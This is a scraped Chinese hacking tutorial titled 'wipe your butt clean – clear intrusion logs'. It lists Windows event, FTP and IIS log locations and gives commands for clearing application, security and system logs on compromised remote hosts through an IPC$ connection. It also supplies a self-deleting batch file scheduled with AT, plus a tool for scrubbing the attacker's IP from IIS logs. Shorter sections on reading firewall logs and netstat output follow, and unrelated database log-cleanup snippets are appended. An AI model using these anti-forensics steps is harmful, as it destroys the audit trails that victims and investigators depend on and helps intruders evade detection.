擦干净屁股-清除入侵日志

应用程序日志、
安全日志、
系统日志、

DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%system32configSecEvent.EVT
系统日志文件:%systemroot%system32configSysEvent.EVT
应用程序日志文件:%systemroot%system32configAppEvent.EVT
FTP日志默认位置:%systemroot%system32logfilesmsftpsvc1,默认每天一个
WWW日志默认位置:%systemroot%system32logfilesw3svc1,默认每天一个日志

以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,
它们这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog

钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败

怎样删除这些日志: 通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除。

下面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 这项服务无法接受请求的“暂停” 或“停止” 操作。
怎么清除系统日志
怎么利用工具清除IIS日志
怎么清除历史和cookie
怎么察看防火墙Blackice的日志
netstat -an 表示的什么意思

===================================
1.系统日志 通过手工很难清除。 这里我们介绍一个工具 clearlog.exe

使用方法:
Usage: clearlogs [\computername] <-app / -sec / -sys>

-app = 应用程序日志
-sec = 安全日志
-sys = 系统日志
a. 可以清除远程计算机的日志
** 先用ipc连接上去: net use \ipipc$ 密码/user:用户名
** 然后开始清除: 方法 
clearlogs \ip -app 这个是清除远程计算机的应用程序日志
clearlogs \ip -sec 这个是清除远程计算机的安全日志
clearlogs \ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接。 那么就需要把这个工具传到远程计算机上面然后清除。 方法:

clearlogs -app 这个是清除远程计算机的应用程序日志
clearlogs -sec 这个是清除远程计算机的安全日志
clearlogs -sys 这个是清除远程计算机的系统日志

安全日志已经被清除。Success: The log has been cleared 成功。

为了更安全一点,同样你也可以建立一个批处理文件。让其自动清除, 做好批处理文件,然后用at命令建立一个计划任务, 让其自动运行, 之后你就可以离开你的肉鸡了。
例如建立一个 c.bat

rem ============================== 开始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 结束

在你的计算机上面测试的时候,可以不要@echo off 可以显示出来。 你可以看到结果
第一行表示: 运行时不显示窗口
第二行表示: 清除应用程序日志
第三行表示:清除安全日志
第四行表示:清除系统日志
第五行表示:删除 clearlogs.exe 这个工具
第六行表示:删除 c.bat 这个批处理文件
第七行表示:退出

用AT命令, 建立一个计划任务, 这个命令在原来的教程里面和杂志里面都有。 你可以去看看详细的使用方法

AT 时间 c:c.bat

之后你就可以安全离开了, 这样才更安全一点。
2.清除iis日志:
工具:cleaniis.exe
使用方法:
iisantidote <logfile dir> <ip or string to hide>
iisantidote <logfile dir><ip or string to hide> stop
stop opiton will stop iis before clearing the files and restart it after
<logfile dir> exemple : c:winntsystem32logfilesw3svc1 dont forget the

使用方法解释:
cleaniis.exe iis日志存放的路径 清除参数

什么意思呢??我来给大家举个例子吧:
cleaniis c:winnt system32logfilesw3svc1 192.168.0.1
这个表示清除log中所有此IP(192.168.0.1)地址的访问记录。推荐使用这种方法。

cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/
这个表示清除这个目录里面的所以的日志

c:winntsystem32logfilesw3svc1 代表是iis日志的位置(windows nt/2000) 这个路径可以改变
c:windowssystem32logfilesw3svc1 代表是iis日志的位置(windows xp/2003) 这个路径可以改变

这个测试表示,在日志里面没有这个ip地址。我们看一下日志的路径,再来看一下我们的ip(192.168.0.1)已经没有了,已经全部清空。

同样这个也可以建立批处理,方法同上面的那个。

===================================
3.清除历史记录及运行的日志:
cleaner.exe
直接运行就可以了。

===================================
4.察看blackice的日志.
这个地方我们可以清除的看到防火墙的日志。

这个表示 有人发过来带有病毒的email附件. ip是: 220.184.153.116
tcp_probe_other 表示 通过tcp 扫描 或者利用别的和你建立连接 通信
这个表示通过端口 80 扫描iis

病毒 nimda
这里需要很多的计算机协议知识,同时也需要对英语有了解,才能更好的分析,如果英语不好,你可以装一个金山词霸。一般情况下,有一些可以不管。

一般这三种情况,不用去管。最上面的critical这个可以去关注一下,一般是确实有别的计算机扫描或者入侵你的计算机

count 代表次数 intruder 是对方的ip event 是通过什么方式(协议) 扫描或者想入侵的 time表示时间

5.===================================
netstat -an 表示什么意思?
使用这个命令可以察看到和本机的所有的连接.

Proto Local Address Foreign Address State
协议 本地端口及IP地址 远程端口及IP地址 状态

LISTENING 监听状态 表示等待对方连接

ESTABLISHED 正在连接着。TCP 协议是TCP

UDP 协议是UDP

TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED
这个表示 利用tcp协议 本机ip(192.168.0.10)通过端口:1115 和远程ip(61.186.97.54)端口:80连接
80端口 表示 http 就是你在访问这个网站。

一般情况下远程ip的端口: 80 21 8000 这个都是正常的,如果是别的,就可以看一下你的计算机了。

时间: 2024-10-07 23:26:34

擦干净屁股-清除入侵日志的相关文章

Linux下自动清除MySQL日志文件

MySQL运行过程中会生成大量的日志文件,占用不少空间,修改my.cnf文件配置bin-log过期时间,在Linux下自动清除MySQL日志文件 [mysqld] expire-logs-days=7 max-binlog-size=268435456

清除SQLServer日志的两种方法

日志文件满而造成SQL数据库无法写入文件时,可用两种方法:一种方法:清空日志.1.打开查询分析器,输入命令DUMP TRANSACTION 数据库名 WITH NO_LOG2.再打开企业管理器--右键你要压缩的数据库--所有任务--收缩数据库--收缩文件--选择日志文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收缩到的最小M数,直接输入这个数,确定就可以了. 另一种方法有一定的风险性,因为SQL SERVER的日志文件不是即时写入数据库主文件的,如处理不当,会造成数据的损失.1: 删除

【转载】linux入侵日志分析

日志也是用户应该注意的地方之一.不要低估日志文件对网络安全的重要作用,因为日志文件能够详细记录系统每天发生的各种各样的事件.用户可以通过日志文件 检查错误产生的原因,或者在受到攻击和黑客入侵时追踪攻击者的踪迹.日志的两个比较重要的作用是:审核和监测.配置好的Linux的日志非常强大.对于 Linux系统而言,所有的日志文件都在/var/log下.默认情况下,Linux的日志文件已经足够强大,但没有记录FTP的活动.用户可以通过修改 /etc/ftpacess让系统记录FTP的一切活动. Linu

10gR2-11gR1,11gR2如何干净的清除并重建OCR和表决磁盘

下面分别讨论10gR2-11gR1和11gR2干净的清除并重建OCR和表决磁盘的方法. 一.10gR2-11gR1干净的清除并重建OCR和表决磁盘的方法 参考METALINK文章:ID 399482.1 How to Recreate OCR/Voting Disk Accidentally Deleted [ID 399482.1]   修改时间 13-JUN-2011     类型 HOWTO     状态 PUBLISHED   In this Document  Goal  Soluti

清除SQL日志文件

1.清除errorlog文件 MSSQL在 C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG 目录下存放这一些日志文件,一共是7个,常常会因为这些日志文件不断增大而导致C盘没有空间 sql2005的error一共有7个,从errorlog,errlog.1一直到errorlog.6要清除这些日志文件的内容,可以在新建查询里执行下面语句: EXEC sp_cycle_errorlog 每执行一次就会产生一个新的errorlog,首先删除

清除SqlServer日志

--在SQL2008中清除日志就必须在简单模式下进行,等清除动作完毕再调回到完全模式. USE [master]GO --GPSLocus是要清除日志的数据库名称ALTER DATABASE [JM-FMIS] SET RECOVERY SIMPLE WITH NO_WAITGOALTER DATABASE [JM-FMIS] SET RECOVERY SIMPLE --简单模式GOUSE [JM-FMIS]GO --GPSLocus_log 是日志文件名,可用 sys.database_fil

sql语句清除mssql日志

DUMP TRANSACTION TestDB WITH NO_LOG 清除日志 DBCC SHRINKFILE ('TestDB_log',1) 收缩数据库文件            -----直接执行这条也可以 BACKUP LOG TestDB WITH NO_LOG 截断事务日志 在 sys.database_files 中找不到数据库 'MobileTrad' 的文件 'MobileTrad_log'.该文件不存在或者已被删除. 原因:你的这个xhtest库一定是从某个原始库backu

SQL Server2005清除数据库日志

SQL2005清空删除日志: 复制代码 代码如下: Backup Log DNName with no_log  '这里的DNName是你要收缩的数据库名,自己注意修改下面的数据库名,我就不再注释了.godump transaction DNName with no_loggoUSE DNNameDBCC SHRINKFILE (2)Go

SQL Server2000清除数据库日志

sqlserver2000压缩日志 可以将jb51.ldf文件变得很小,方便备份数据库等,在sqlserver查询分析器中执行即可.复制代码 代码如下: DUMP TRANSACTION [jb51] WITH NO_LOGBACKUP LOG [jb51] WITH NO_LOGDBCC SHRINKDATABASE([jb51])